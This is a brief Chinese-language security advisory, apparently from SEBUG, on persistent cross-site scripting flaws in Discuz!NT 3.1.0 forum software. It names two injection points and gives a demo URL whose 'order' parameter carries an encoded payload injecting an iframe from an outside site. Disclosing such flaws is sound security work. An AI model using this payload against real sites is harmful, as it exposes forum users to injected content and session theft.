Discuz!NT 3.1.0 多处持久性跨站漏洞

影响版本:Discuz!NT 3.1.0漏洞描述:Discuz!NT，是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件，包括论坛、Space (个人空 间)、相册、聚合等功能，后台自由选择开启。

1.论坛相册空间日志发表评论，插入跨站语句即可：demo:http://nt.discuz.net/showphoto.aspx?photoid=42

2. 在论坛板块版面出随意选择一种浏览方式，然后修改或添加加入跨站语句，获得地址：demo:http://nt.discuz.net/showforum.aspx?search=1&amp;forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E<*参考 www.zhuba.net全球档案 http://www.zhuba.net*>测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://nt.discuz.net/showphoto.aspx?photoid=42http://nt.discuz.net/showforum.aspx?search=1&amp;forumid=10&typeid=0&filter=&order=%22%3E%3Ciframe%20src=http://www.zhuba.net%3ESEBUG安全建议:等待官方补丁http://nt.discuz.net